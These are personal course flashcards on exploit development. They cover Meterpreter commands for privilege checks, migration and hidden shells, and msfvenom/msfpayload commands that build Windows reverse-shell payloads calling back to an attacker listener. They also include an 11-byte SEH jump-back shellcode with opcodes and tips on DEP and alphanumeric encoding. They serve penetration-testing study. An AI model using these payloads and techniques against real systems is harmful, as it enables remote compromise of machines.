Course Flashcards
Learning notes
msf nuggets
meterpreter crashing
- could be auto migrate
unset InitialAutoRunScript
or check in 'show options advanced'
useful commands:
getuid - shows the user (and privileges) the session is running as
ps - processes
migrate [PID] for migrating into another process, say one running as SYSTEM
shell hidden from user in meterpreter
'execute -f cmd -c -H'
'interact 1' (where 1 is the channel id) (does not work)
'execute -f cmd -c -H -i' to go straight into interact
DEP
If you can't execute NOPs when working out the exploit, that is very likely DEP.
A ROP chain is the way forward then
If shell unreliable try exitfunc=thread
EXITFUNC=thread
msfencode modern syntax
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.98.73 LPORT=443 --format=exe > shell.exe
exercise 3 reverse shell proper syntax
cd /usr/share/framework2
./msfpayload win32_reverse LHOST=192.168.98.73 LPORT=443 R| hexdump -C
oneliner to get it clean
./msfpayload win32_reverse LHOST=192.168.98.73 LPORT=443 R | hexdump -C | grep -v 0000011f | cut -d " " -f3-19 | sed 's/ //g' | tr -d '\n'
reboot windows from command line - good for working out ASLR
shutdown -r -t 1
msfencode alphanumeric modern usage
For encoding egghunters say or anything in alphanumeric
msfvenom -p generic/custom PAYLOADFILE=./egg.bin -e x86/alpha_mixed -f python
highlight changes in code in red
put in ‘int 3’ in assembler
aaron adams compact back jump
The code is shown below, and works based on the fact that after taking the original POP, POP, RETN to jump into the four byte space before the SEH Overwrite, another pointer to the same memory location exists three places down on the stack. We basically get this memory address into the ECX register, decrement the CH register by 1 three times (which has the effect of decreasing ECX by a total of 768 or three times 256 since CH represents the second least significant byte of ECX), and then JUMP to ECX. This moves us back 768 bytes from the location where the original POP, POP, RETN instruction lands, and gives us more than enough space to use most Windows shellcode. At 11 bytes it is also very compact and will fit into very small buffer areas.
"\x59\x59\x59\xfe\xcd\xfe\xcd\xfe\xcd\xff\xe1"
11 bytes:
POP ECX   \x59
POP ECX   \x59
POP ECX   \x59
DEC CH    \xfe\xcd
DEC CH    \xfe\xcd
DEC CH    \xfe\xcd
JMP ECX   \xff\xe1
This jumpcode takes up 11 bytes of space and we can place it in our buffer immediately after our SEH overwrite in order to get back into the section of the buffer before our SEH overwrite. We simply take 768 away from the offset we know to point to the four byte space before the SEH overwrite (962) to determine exactly where our jump will land - 194 bytes from the start of the buffer. We then rewrite our exploit to move our shellcode into the first area of the buffer (at the correct offset), and we add the jumpcode immediately after the SEH overwrite.
http://www.thegreycorner.com/2010/01/seh-stack-based-windows-buffer-overflow.html
- nice technique for jumping back with very short code, via Aaron Adams - see pp. 99-100 in the pdf
http://phrack.org/issues/62/7.html
usage
https://www.exploit-db.com/exploits/14651
stable raw reverse shell
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp lhost=192.168.98.73 lport=443 EXITFUNC=thread -f python
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of python file: 1556 bytes